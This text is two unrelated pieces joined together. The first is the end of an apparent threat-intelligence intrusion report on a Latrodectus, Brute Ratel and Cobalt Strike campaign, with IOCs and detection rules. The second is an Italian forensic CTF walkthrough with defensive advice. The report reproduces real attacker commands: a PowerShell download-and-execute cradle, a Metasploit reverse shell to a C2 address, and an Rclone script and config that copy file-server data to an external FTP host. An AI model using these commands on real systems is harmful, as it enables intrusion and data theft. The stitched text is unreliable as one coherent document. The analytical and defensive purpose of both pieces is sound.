adequate access, they finally used the /reset command to restore default permissions: icacls C:\Users\ \Pictures\ad_users.txt /setowner " " /T /C icacls C:\Users\ \Pictures\ad_users.txt /setowner " \ " /T /C icacls "C:\Users\ \Pictures\ad_users.txt" /reset /T After running the Cobalt Strike beacons laterally on several hosts, the threat actor conducted remote user enumeration across domain systems using the following command from the beachhead host: quser The threat actor utilized the PowerView module Invoke-ShareFinder twice during the intrusion. IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:49157/'); Invoke-ShareFinder -CheckShareAccess -Verbose | Tee-Object ShareFinder.txt Approximately 45 minutes following the Metasploit shell deployment attempt on the second domain controller, the threat actor initiated an additional round of AdFind reconnaissance from the beachhead host: AdFind.exe -b dc=domain,dc=local -f (objectcategory=person) > adflogs\domain.local_ad_users.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=computer) > adflogs\domain.local_ad_computers.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=organizationalUnit) > adflogs\domain.local_ad_ous.txt AdFind.exe dc=domain,dc=local -subnets -f (objectcategory=subnet) > adflogs\domain.local_ad_subnets.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=group) > adflogs\domain.local_ad_group.txt Although the threat actor attempted to compress the collected data, forensic analysis did not identify any created zip archives on the system. "7z.exe" a -mx1 -r0 adflogs.zip adflogs The threat actor returned 28 days after the initial access to run a final round of network scanning discovery. Operating from a backup server, the threat actor deployed the rustscan tool through the Cobalt Strike-injected spoolsv.exe process, first running rustscan with the help flag. The threat actor then began scanning various /16 and /8 network blocks for SMB services. rustscan.exe -a REDACTED/16 -p 445 --no-nmap rustscan.exe -a REDACTED/16 -p 445 rustscan.exe -a REDACTED/8 -p 445 "nmap -vvv -p 445 REDACTED" WMI Remoting Although the threat actor ran discovery commands just under an hour from the initial access, the first lateral movement attempt came three days into the intrusion when the threat actor attempted to execute the system.dl_ Cobalt Strike beacon on a domain controller via WMIC remote execution. This execution was not successful as it was not observed on the domain controller. Remote Services After the failed lateral movement attempt via WMIC, the threat actor pivoted to PsExec. The initial PsExec command also failed since the threat actor forgot to include the accepteula flag. After fixing the forgotten EULA mistake, they were able to successfully execute system.dl_ on the domain controller via rundll32. The threat actor then proceeded to execute the same command on a file share server and backup server minutes after the domain controller execution. Six hours after this initial lateral movement activity, the threat actor deployed and executed the zero.exe payload from C:\ProgramData on the beachhead. This payload, delivered via BackConnect session, was a custom implementation of the Zerologon vulnerability (CVE-2020-1472) exploit with capabilities for credential harvesting and remote code execution. During the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable was executed on the beachhead host and targeted a second domain controller, overall it was executed eight different times with a different username being used every execution. The execution used remote services to run code on lateral hosts. After the completion of the zero.exe executions, the threat actor attempted to establish a Metasploit reverse shell connection via a remote service on the same domain controller, to the C2 server at 217.196.98[.]61:4444. RDP RDP was another Windows native tool used by the threat actor for lateral movment. The threat actor had extracted domain admin credentials as discussed in the Credential Access section, these credentials were used by the threat actor to login to two servers in the environment from the beachhead device via RDP, giving them interactive admin access to both devices. While the logins originated from the beachhead host the threat actor leaked their source hostname during the authentication process. VPS2DAY-32220LE The threat actor’s hostname implies that the infrastructure used by them was provided via a German hosting company VPS2DAY, which seems to be operating under the name Servinga since the vps2day domain redirects to Servinga. Latrodectus/Backconnect The malware used to gain the initial foothold in the host was a Latrodectus Javascript file. The aforementioned file has been associated with high confidence to the Russian threat actor LUNAR SPIDER by Eclecticiq. It is important to note that although the sample contained only two domains, the injected explorer.exe communicated with three additional C2 servers. After further investigating the explorer’s memory, the following HTTPS request was identified towards one of the new domains: Upon decrypting the encrypted traffic sent by Latrodectus to the C2, the following information was identified: One extra functionality observed from the Latrodectus malware was Command and Control communication using the Backconnect protocol. More specifically, connections from explorer.exe and dllhost.exe were performed toward two different IP addresses. Additionally, these IP’s have been categorized with moderate confidence related to IcedId Backconnect, which commonly shares infrastructure with Latrodectus. Connections to the first IP started during the first day and then swapped to the second IP on the fifth day. As it was previously mentioned, utilizing Backconnect, various tasks were performed, such as browsing the file system, reading files, and uploading malware on the infected hosts. Brute Ratel The MSI file downloaded by the malicious Javascript contained a Brute Ratel DLL (upfilles.dll) that started C2 communication to a series of remote hosts. Of note is the use of the Tyk.io service which we have covered in prior reports. On the fifth day, the threat actor deployed a second Brute Ratel badger, named wscadminui.dll, which communicated with the following domains: Lsassa Lsassa.exe was a .NET malware that was deployed on the fourth day. It attempted to communicate with its C2 server every 250 seconds. Additionally, each POST request contained the hostname of the infected workstation and the username of the compromised user, which were sent to the server. Metasploit The psexec Metasploit module was utilized by the threat actor in order to perform lateral movement. During the analysis of the Metasploit shellcode, it was identified that it utilized the IP 217.196.98.61 to perform C2 communication. Although the Metasploit shellcode was executed, it was unable to establish a successful Command and Control connection, and the server rejected the connection. Cobalt Strike The final Command and Control tool used was Cobalt Strike. In the C2 communication, both HTTPS and HTTP traffic were detected: To summarize the Command and Control activity and showcase its intensity over time, the following graphs were made: Beaconing with Cobalt Strike Beaconing without Cobalt Strike Rclone From a Cobalt Strike beacon on a file share server, the threat actor dropped a data exfiltration toolkit in the ProgramData directory. This included a VBScript launcher (start.vbs), batch automation script (run.bat), renamed Rclone (sihosts.exe), and Rclone configuration file (rclone.conf). This toolkit automated the theft of sensitive data by syncing it to threat actor-controlled cloud storage using the legitimate Rclone utility. Content of run.bat: C:\programdata\sihosts.exe copy "E:" ftp:REDACTED\ \E -q --exclude "*.{ai,bin,blf,bmp,cab,cat,cdf-ms,cdp,cfs,DAT,DAT*,DATA,db,db-shm,db-wal,dbg,dll,download,dwg,dxf,exe,*exe,feedsdb-ms,ico,idea,idx,indd,inf,ini,iso,jcp,jfm,jrs,js,json,jtx,lck,lnk,log,LOG*,LOG1,LOG2,lst,manifest,msi,nak,nvram,ost,pma,png,psd,pwd,rar,regtrans-ms,search-ms,searchconnector-ms,sys,tbacc*,tbres,toc,uca,val,vmdk,vmsd,vmx,vmxf,vol,vswp,wpl,zip}" --inplace --ignore-existing --auto-confirm --multi-thread-streams 45 --transfers 45 --min-size 1k --max-age 90M The threat actor dropped the Rclone configuration file (rclone.conf) twice on the file share server in quick succession. The first rclone.conf file creation occurred three minutes before the second one, with two executions occurring between them, hinting that there may have been a mistake in the first config file dropped by the threat actor. The first execution had a syntax error with specifying the drive to exfiltrate files from (threat actor added an extra colon to the drive), and the second execution showed that the threat actor had initially dropped the config file with an incorrect username added to it. The FTP traffic shows that the username used was J0eBidenAbrabdy1aS3ha2 when it should have been J0eBidenAbrabdy1aS3ha2Yeami which was the username found in the rclone.conf file found on the infected device (the same password was used in both executions). [ftp] type = ftp host = 45.135.232.3 user = J0eBidenAbrabdy1aS3ha2Yeami #port = 21 pass = #tls = false Exfiltration activity took place over 9 hours and 46 minutes. As discussed in the Exfiltration section, on the twentieth day, the threat actor successfully performed data exfiltration. Despite that, no further final actions on objectives were performed until they were evicted from the network. Atomic RDP Client Name VPS2DAY-32220LE Rclone configuration host: 45.135.232.3 user: J0eBidenAbrabdy1aS3ha2Yeami user: J0eBidenAbrabdy1aS3ha2 Latrodectus Domains workspacin[.]cloud illoskanawer[.]com grasmetral[.]com jarkaairbo[.]com scupolasta[.]store Backconnect IP Addresses 185.93.221.12 193.168.143.196 Lsassa Backdoor Domain cloudmeri[.]com Lsassa Backdoor IP Addresses 162.0.209.121 Brute Ratel Domains anikvan[.]com altynbe[.]com boriz400[.]com ridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io uncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io erbolsan[.]com samderat200[.]com dauled[.]com kasymdev[.]com kasym500[.]com Brute Ratel IP Addresses 95.164.68.73 138.124.183.215 91.194.11.183 94.232.249.100 94.131.108.254 94.232.249.108 45.150.65.85 195.123.225.161 195.211.98.249 195.123.225.251 Metasploit IP Addresses 217.196.98.61 Cobalt Strike Domains avtechupdate[.]com Cobalt Strike IP Addresses 206.206.123.209 45.129.199.214 31.13.248.153 Latrodectus Configuration Config: { "Version": "1.3", "Direction": "4", "C2s": [ "hxxps://workspacin[.]cloud/live/", "hxxps://illoskanawer[.]com/live/" ], "RC4": "xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8", "GroupID": "2221766521", "CampaignID": "Electrol" } Decrypted Strings: { "pid": "%d", "proc": "%s", "subproc": [ ] } &desklinks=[ *.* "%s" ] &proclist=[ { "pid": "%d", "proc": "%s", "subproc": [ ] } /c ipconfig /all C:\Windows\System32\cmd.exe /c systeminfo C:\Windows\System32\cmd.exe /c nltest /domain_trusts C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts C:\Windows\System32\cmd.exe /c net view /all /domain C:\Windows\System32\cmd.exe /c net view /all C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain C:\Windows\System32\cmd.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List C:\Windows\System32\wbem\wmic.exe /c net config workstation C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed C:\Windows\System32\cmd.exe /c whoami /groups C:\Windows\System32\cmd.exe &ipconfig= &systeminfo= &domain_trusts= &domain_trusts_all= &net_view_all_domain= &net_view_all= &net_group= &wmic= &net_config_ws= &net_wmic_av= &whoami_group= runnung front /files/ %d %s%s files/bp.dat %s\%d.dll %d.dat %s\%s init -zzzz="%s\%s" Electrol Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Content-Type: application/x-www-form-urlencoded POST GET CLEARURL URLS COMMAND ERROR xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8 counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ https://workspacin.cloud/live/ https://illoskanawer.com/live/ %s%d.dll %s%d.exe Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) <!DOCTYPE &mac= %02x :%02x ; &computername=%s &domain=%s C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s C:\WINDOWS\SYSTEM32\rundll32.exe %s 12345 &stiller= Cobalt Strike Beacon Configuration (system.dl_ | cron801.dl_) Version: 4.6 Socket: 80 Beacon Type: HTTP MaxGetSize: 2105681 URL: hxxp://45.129.199[.]214/vodeo/wg01ck01 Jitter: 49 Encryption Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGcLYJG9miEP3Lp+FqQ74n9HNbqI/s4ZE5fg0PHR7voXFnSWgDr1g9wmLgG5B5YMIPXZXzJlFUwEYSPam58mUqy+87onjq1rXP6Dx7DXqZQ+3b6ZvfCs+5jrfxcHXRp8XD03AYmyKETAAQXsJd8ipoTIexVlLLPsWXyH9xZ/KC1wIDAQAB (RSA) HttpPostUri: /vodeo/vid_wg01ck01 User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 MalleableC2Instructions: Remove 4338 chars from the end, Remove 4183 chars from the begςinning, NetBIOS decode 'A', XOR mask w/ random key HTTPGetClient: mask, header Accept: application/xml, text/html, application/xhtml+xml HTTPPostClient: mask, mask, header Accept: text/html, application/xhtml+xml, application/json HTTPGet_Verb: GET HTTPPost_Verb: POST spawnto_x64: %windir%\sysnative\gpupdate.exe spawnto_x86: %windir%\syswow64\gpupdate.exe Proxy_Behavior: Use IE settings Watermark: 987654321 Jitter: 49 ProcessInject_MinAllocation: 19836 ProcessInject_AllocationMethod: NtMapViewOfSection Computed rustscan.exe 9eaa8464110883a15115b68ffa1ecf7d 5348970723b378c7cae35bb03d8736f8e5a9f0ac 37471af00673af4080ee21bd248536147e450d2eff45e8701a95d1163a9d62fe lsassa.exe 50abc42faa70062e20cd5e2a2e2b6633 97d72c8bbcf367be6bd5e80021e3bd3232ac309a 203eda879dbdb128259cd658b22c9c21c66cbcfa1e2f39879c73b4dafb84c592 run.bat c8ea31665553cbca19b22863eea6ca2c ba99cd73b74c64d6b1257b7db99814d1dc7d76b1 411dfb067a984a244ff0c41887d4a09fbbcd8d562550f5d32d58a6a6256bd7b2 start.vbs 4b3e9c9e018659d1cf04daf82abe3b64 333e1c5967a9a6c881c9573a3222bed6ada911c6 1a8ebf914ebea34402eecbf0985f05ae413663708d2fcc842fc27057ac5ec4ed sys.dll ad3c52316e0059c66bc1dd680cf9edad 8dfa63c0bb611e18c8331ed5b89decf433ac394a 100e03eb4e9dcdab6e06b2b26f800d47a21d338885f5dc1b42c56a32429c9168 Cobalt Strike system.dl_ or cron801.dl_ 495363b0262b62dfc38d7bfb7b5541aa 2d92890374904b49d3c54314d02b952e1a714e99 77eede38abdc740f000596e374b6842902653aeafb6c63011388ebb22ec13e28 BruteRatel upfilles.dll ccb6d3cb020f56758622911ddd2f1fcb 4a013f752c2bf84ca37e418175e0d9b6f61f636d f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de BruteRatel wscadminui.dll d7bd590b6c660716277383aa23cb0aa9 38999890b3a2c743e0abea1122649082a5fa1281 6c3b2490e99cd8397fb79d84a5638c1a0c4edb516a4b0047aa70b5811483db8f zero.exe 91889658f1c8e1462f06f019b842f109 33a6b39fbe8ec45afab14af88fd6fa8e96885bf1 36bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24 c356468.exe A2B6479A69B51AE555F695B243E4FDA1 23FFF588E3E5CC6678E1F77FAB9318D60F3AC55F 8FB5034AEDF41F8C8C4C4022FDDE7DB3C70A5A7C7B5B4DEC7F6A57715C18A5BF Network ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND ET MALWARE Windows Microsoft Windows DOS prompt command Error not recognized ET POLICY Observed MSI Download ThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%) ThreatFox Unidentified 111 (Latrodectus) botnet C2 traffic (ip:port - confidence level: 75%) ThreatFox botnet C2 traffic (domain - confidence level: 100%) ET HUNTING ZIP file exfiltration over raw TCP ET DROP Spamhaus DROP Listed Traffic Inbound group 5 ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check Sigma Search rules on detection.fyi or sigmasearchengine.com DFIR Private Rules: 67eb826d-7745-416c-9674-525ef0dc7610 : Launching VNC Interactive Session e652d235-b994-432e-b2f3-15a9cee381df : Domain Enumeration Using Netdom Query f8a8998f-dfe9-4942-812c-f4e591653ced : MS-Settings Shell Command Hijacking 1f959fda-4c54-4dad-9bca-4a5a65529772 : MSI Payload Executing Suspicious DLL Through Rundll32 a566b9e8-0a5c-4128-b499-c7632915d5e2 : Suspicious Type Command Over Administrative Share c42e8603-0311-4e4e-8923-4c1e8be9d78d : Suspicious Computer Machine Password Reset 1b8ad6a1-35c3-4400-9678-e7d3e3b0acfd : DNS data export using dnscmd.exe b326e9ad-0d9b-43bf-8bd0-9620839c6f6b : Veeam Backup Credential Theft Detection Sigma Repo: d522eca2-2973-4391-a3e0-ef0374321dae : Abused Debug Privilege by Arbitrary Parent Processes d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 : CobaltStrike Named Pipe Patterns 7b434893-c57d-4f41-908d-6a17bf1ae98f : Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location 08249dc0-a28d-4555-8ba5-9255a198e08c : Outbound Network Connection Initiated By Script Interpreter ed74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools 85b0b087-eddf-4a2b-b033-d771fa2b9775 : PowerShell Download and Execution Cradles 3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder 8834e2f7-6b4b-4f09-8906-d2276470ee23 : PsExec/PAExec Escalation to LOCAL SYSTEM 9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution df55196f-f105-44d3-a675-e9dfb6cc2f2b : Renamed AdFind Execution 5bb68627-3198-40ca-b458-49f973db8752 : Rundll32 Execution Without Parameters 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 : Shell Open Registry Keys Manipulation 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : Suspicious PowerShell Download and Execute Pattern 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 : Suspicious Process Created Via Wmic.EXE 5cc2cda8-f261-4d88-a2de-e9e193c86716 : Suspicious Processes Spawned by WinRM dcdbc940-0bff-46b2-95f3-2d73f848e33b : Suspicious Spool Service Child Process 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation 1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folder Yara New Rules: https://github.com/The-DFIR-Report/Yara-Rules/blob/main/28761/28761.yar 61b951e4-0c27-59c0-8ea2-715b673fdcee : CAPE_Bruteratel 5ae680b0-5ad2-5e82-87f8-b0af4fec18de : CAPE_Bruteratelconfig 0ddc3e0a-c4ca-5342-b029-107ce1f2751e : CAPE_Bruteratelsyscall 956b6736-b3ef-5974-b3dd-02d04336dbe8 : CAPE_Latrodectus_1 6bd6fbb4-6634-5b51-90f0-f24e48d69043 : EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt 2e0925bc-6929-57fd-a204-d14352ab043b : MALPEDIA_Win_Brute_Ratel_C4_Auto 1adbbac8-6bfc-5d06-9cad-1cba809f72a0 : MALPEDIA_Win_Cobalt_Strike_Auto 02322cd8-96f0-5b56-94f1-88df3945f27c : MALPEDIA_Win_Latrodectus_Auto 042a598d-66fa-4994-a793-228355abd5dd : SEKOIA_Latrodectus_Br4_Js_Dropper 29076cf5-f391-42f2-918f-e1c929bd368d : SEKOIA_Latrodectus_Exports d5b53d68-55f9-5837-9b0c-e7be2f3bd072 : SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator 63b71eef-0af5-5765-b957-ccdc9dde053b : SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decrypt af558aa2-a3dc-5a7a-bc74-42bb2246091c : SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Strings d396ab0e-b584-5a7c-8627-5f318a20f9dd : SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22 a7dae4c7-672e-58fb-8542-90fa90d991a4 : TRELLIX_ARC_MALW_Cobaltrike 113ba304-261f-5c59-bc56-57515c239b6d : VOLEXITY_Trojan_Win_Cobaltstrike 4110d879-8d36-4004-858d-e62400948920 : Windows_Trojan_BruteRatel_4110d879 5b12cbab-c64c-4895-a186-b940bf4a8620 : Windows_Trojan_BruteRatel_5b12cbab 644ac114-cc66-443e-9dd0-a591be99a86c : Windows_Trojan_BruteRatel_644ac114 3dc22d14-a2f4-49cd-a3a8-3f071eddf028 : Windows_Trojan_CobaltStrike_3dc22d14 663fc95d-2472-4d52-ad75-c5d86cfc885f : Windows_Trojan_CobaltStrike_663fc95d 8d5963a2-54a9-4705-9f34-0d5f8e6345a2 : Windows_Trojan_CobaltStrike_8d5963a2 b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca : Windows_Trojan_CobaltStrike_b54b94ac 841ff697-f389-497a-b813-3b9e19cba26e : Windows_Trojan_Latrodectus_841ff697 Access Token Manipulation - T1134 Archive via Utility - T1560.001 Bypass User Account Control - T1548.002 Credentials from Web Browsers - T1555.003 Credentials In Files - T1552.001 Domain Accounts - T1078.002 Domain Account - T1087.002 Domain Groups - T1069.002 Domain Trust Discovery - T1482 Drive-by Compromise - T1189 Encrypted/Encoded File - T1027.013 Exfiltration Over Alternative Protocol - T1048 Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003 Exploitation of Remote Services - T1210 File and Directory Discovery - T1083 File Deletion - T1070.004 Ingress Tool Transfer - T1105 JavaScript - T1059.007 Junk Code Insertion - T1027.016 Lateral Tool Transfer - T1570 Local Account - T1087.001 Local Groups - T1069.001 LSASS Memory - T1003.001 Malicious File - T1204.002 Masquerading - T1036 Network Service Discovery - T1046 Network Share Discovery - T1135 Non-Standard Port - T1571 PowerShell - T1059.001 Process Injection - T1055 Registry Run Keys / Startup Folder - T1547.001 Remote Desktop Protocol - T1021.001 Remote System Discovery - T1018 Rundll32 - T1218.011 Scheduled Task - T1053.005 Security Software Discovery - T1518.001 Service Execution - T1569.002 SMB/Windows Admin Shares - T1021.002 System Information Discovery - T1082 System Owner/User Discovery - T1033 Web Protocols - T1071.001 Windows Command Shell - T1059.003 Windows File and Directory Permissions Modification - T1222.001 Windows Management Instrumentation - T1047 Internal case #PR37865 #TB28761
thedfirreport.comSep 29, 2025extracted
Dall’attacco alla risposta, come gestire l’incubo della compromissione informatica
Subire un incidente informatico è come sprofondare in un incubo dal quale pare impossibile svegliarsi. Improvvisamente, i sistemi iniziano a mostrare anomalie, i client segnalano problemi di sicurezza, le mailbox si riempiono di mail sospette e, infine, tutte le informazioni che rappresentano il cuore pulsante dell’azienda sono bloccate e inaccessibili. In questo articolo, ripreso da una lezione di “Forensic Analysis” presso l’Università di Perugia, vedremo come un’organizzazione può passare dall’essere perfettamente operativa al ritrovarsi con i server compromessi, le credenziali esposte e addirittura il proprio software legittimo trasformato in un veicolo di malware per i clienti. Inoltre, sono presenti dei box difensivi che accompagnano ogni fase dell’attacco. L’obiettivo è offrire al lettore non solo una guida tecnica e forense per comprendere l’analisi di un incidente, ma anche spunti pratici di difesa, utili a rafforzare la postura di sicurezza in ambienti reali. Ogni sezione, quindi, non si limita a mostrare “come è avvenuto l’attacco”, ma propone strategie concrete per prevenirlo o mitigarne gli effetti. Indice degli argomenti APTNightmare: l’incubo di subire un attacco informatico Un APTNightmare riassume alla perfezione quello che un’azienda vive quando diventa bersaglio di un gruppo di cyber criminali determinati: un’escalation di eventi che sconvolge infrastrutture, processi e reputazione. Bene, rispondete al telefono che squilla e disdite gli impegni, oggi sarete ingaggiati per risolvere un grave incidente informatico. Incident response: tra finzione e realtà Ovviamente il caso è adattato ai fini narrativi per veicolare i concetti tecnici. In casi reali di compromissione, specialmente se grave, l’Incident Response non si limita a un’analisi forense svolta da remoto. Al contrario, coinvolge un processo molto più articolato che comprende ad esempio: Valutazione dell’impatto e priorità: mentre il team forense si occupa di raccogliere e analizzare gli artefatti, la direzione aziendale e il team IT gestisce la Business Continuity, cercando di mantenere operative le funzioni critiche dell’organizzazione. Confinamento e contenimento: fase in cui si isolano i sistemi compromessi per impedire all’attacco di propagarsi ulteriormente. Remediation: applicazione di patch, modifiche alle configurazioni, cambio password e quant’altro necessario per rimuovere o bloccare l’accesso malevolo. Ripristino: una volta ridotta la minaccia, si agisce per ripristinare i servizi e i sistemi in modo sicuro. Lezioni apprese e miglioramenti: al termine si analizza l’intero processo, traendo insegnamenti e rinforzando le difese per il futuro. Questo giusto per sottolineare che, benché in questa CTF ci concentriamo soprattutto sull’aspetto forense, nella realtà i diversi team (IT, legale, comunicazione, direzione, forense ecc.) agiscono in parallelo e con la massima tempestività, perché in un vero scenario di attacco ogni minuto di ritardo può comportare perdite ingenti o danni irreparabili. La “chiamata alle armi” Ecco un breve racconto romanzato di quello che succedere durante i primi minuti di un attacco informatico in azienda. Responsabile IT (RIT): «Salve, sono Marco Conti, Responsabile IT di CS Corp. Mi scusi se la chiamo a quest’ora, ma abbiamo un’emergenza: i nostri server sembrano essere stati compromessi» Noi: «Capisco, signor Conti. Può darmi qualche dettaglio in più?» RIT: «Certo. Il nostro sistema di monitoraggio e i log di posta evidenziano un traffico insolito da un indirizzo IP interno verso host che non riconosciamo. Non solo: alcuni utenti hanno ricevuto file e allegati “strani”» Noi: «Ha già un’idea di come l’attaccante sia entrato?» RIT: «Non ancora. Stavamo effettuando una migrazione verso Office 365» Noi: «Capisco. Se mi inviate tutti gli artefatti, posso mettermi al lavoro e iniziare subito un’analisi forense approfondita.» RIT: «Glieli mando all’istante. Per cortesia, faccia il possibile per scoprire come ci hanno colpito, quali dati potrebbero essere stati esfiltrati e, soprattutto, come fermare quest’incubo!» Come prima cosa, scarichiamo il file da analizzare: aptnightmare.zip. Il file è protetto da una password, che il nostro cliente ci ha fornito tramite chat criptata: hacktheblue. Quindi estraiamo il contenuto utilizzando il comando: unzip -P hacktheblue aptnightmare.zip All’interno dell’archivio ZIP troviamo quattro file: DiskImage_CEO-US.zip Memory_WebServer.mem traffic.pcapng Ubuntu_5.3.0-70-generic_profile.zip Cominciamo con l’analizzare il file traffic.pcapng. Per questo scopo, utilizzeremo Wireshark, uno strumento di analisi di traffico di rete, ideale per esplorare file PCAP. L’idea è di identificare da quali Indirizzi IP scaturisce il maggior volume di traffico, per individuare quale potrebbero essere l’attaccante e la vittima. Quindi, digitiamo il comando: wireshark traffic.pcapng Esaminando il traffico HTTP filtrato, notiamo che due indirizzi IP interni compaiono costantemente: 192.168.1.3 e 192.168.1.5. Sono loro i principali protagonisti dello scambio di dati (si scambiano migliaia di pacchetti). Questo suggerisce che uno dei due è il server bersaglio e l’altro è la macchina dell’attaccante. Per capire chi è il server web, osserviamo il senso delle comunicazioni HTTP: vediamo numerose richieste GET provenienti da 192.168.1.5 dirette a 192.168.1.3, con risposte dal .1.3. Ciò indica che 192.168.1.3 sta fornendo contenuti (rispondendo alle richieste) e quindi con alta probabilità è il server web infetto, mentre 192.168.1.5 è il client che invia le richieste, ossia l’IP dell’attaccante. Osservando il traffico tra 192.168.1.5 (attaccante) e 192.168.1.3 (server), notiamo molti pacchetti TCP con flag SYN inviati dall’attaccante seguiti da risposte dal server. Questo indica un port scanning, probabilmente di tipo SYN scan (la modalità predefinita di nmap). In un SYN scan, l’attaccante invia un pacchetto TCP SYN a diverse porte del server: se la porta è aperta, il server risponde con SYN+ACK (acknowledgment), se è chiusa, il server risponde con un RST o non risponde affatto. Possiamo usare il seguente filtro in WireShark tcp.flags.syn == 1 && tcp.flags.ack == 1 && ip.src == 192.168.1.3 && ip.dst == 192.168.1.5 Questo mostra i pacchetti dove il server (192.168.1.3) risponde SYN+ACK all’attaccante, segnalando che quella porta sul server è aperta (ha accettato la richiesta di handshake). Tale filtro non è però sufficiente in quanto mostra tutti i tentativi di connessione come una riga distinta, ogni pacchetto (o ritrasmissione) corrispondente a un SYN/ACK inviato dal server. Ciò che a noi interessa è però capire quante porte sono state trovate aperte è il numero di porte uniche (cioè i port number) a cui il server ha risposto con SYN/ACK al primo handshake. In poche parole, dobbiamo eliminare le ripetizioni. Per fare questo utilizziamo il comando: tshark -r traffic.pcapng -Y “ip.src==192.168.1.3 && ip.dst==192.168.1.5 && tcp.flags.syn==1 && tcp.flags.ack==1” -T fields -e tcp.srcport | sort -un dove: -r traffic.pcapng : carica il file PCAP/PCAPNG. -Y “…” è il filtro di visualizzazione (Wireshark Display Filter) che fa sì che tshark processi solo i pacchetti in cui: ip.src==192.168.1.3: il server è la sorgente (sta inviando il SYN/ACK). ip.dst==192.168.1.5: l’attaccante è la destinazione. tcp.flags.syn==1 && tcp.flags.ack==1: stiamo catturando solo i pacchetti che hanno entrambi i bit SYN e ACK impostati (le risposte di un handshake). -T fields -e tcp.srcport : fa sì che tshark stampi solo il campo “porta sorgente” (che, in questo scenario, è la porta del server scansionata). | sort -un: ordina i numeri di porta in modo univoco e crescente, scartando i duplicati. L’output del comando ci restituisce 15 porte aperte. In realtà, esaminando i pacchetti relativi alla porta 5555 possiamo notare che la comunicazione non ha completato il normale handshake (probabilmente perché l’attaccante l’ha usata diversamente) o la comunicazione non è andata a buon fine). Pertanto, escludiamo la porta 5555 dal conteggio degli effettivi servizi aperti enumerati durante la scansione l’attaccante ha trovato 14 porte aperte sul server. Port Scan: cos’è e come difendersi Il port scanning rappresenta una delle prime fasi di ogni attacco informatico: è il momento in cui l’attaccante cerca di “mappare” la rete, scoprendo quali porte e servizi sono esposti. Quando questa attività viene condotta da gruppi criminali o APT, può assumere forme molto più sofisticate di un semplice nmap lanciato da terminale: scansioni lente, distribuite, oppure invisibili ai log tradizionali. Per questo motivo è fondamentale mettere in atto misure difensive mirate, a partire dalla riduzione della superficie di attacco: ogni porta aperta in più è un’opportunità in più per un attaccante. L’uso di firewall host-based, micro-segmentazione e regole “default deny” aiutano a esporre solo i servizi strettamente necessari. Accanto a questo, è altrettanto importante la rilevazione attiva delle scansioni, tramite strumenti come Suricata, Zeek o moduli specifici nei firewall di nuova generazione. Il principio è semplice: se un indirizzo IP tenta di aprire decine di porte in pochi secondi, è probabilmente un tentativo di scansione. In questi casi, possiamo attivare meccanismi di auto-blocco, come Fail2Ban o CrowdSec, che reagiscono in tempo reale mettendo in quarantena l’origine del traffico sospetto. Un’altra strategia efficace è quella di ingannare l’attaccante, reindirizzando i suoi tentativi verso honeypot controllati: sistemi fittizi, creati appositamente per attrarre traffico malevolo e raccogliere indicatori utili all’analisi. Infine, vale la pena ricordare che non tutti gli attacchi arrivano dall’esterno: un dispositivo compromesso internamente potrebbe eseguire una mappatura “laterale”. È quindi fondamentale avere visibilità anche sul traffico interno, tramite log di switch, regole di detection sui dispositivi di rete e controlli sui permessi tra subnet. 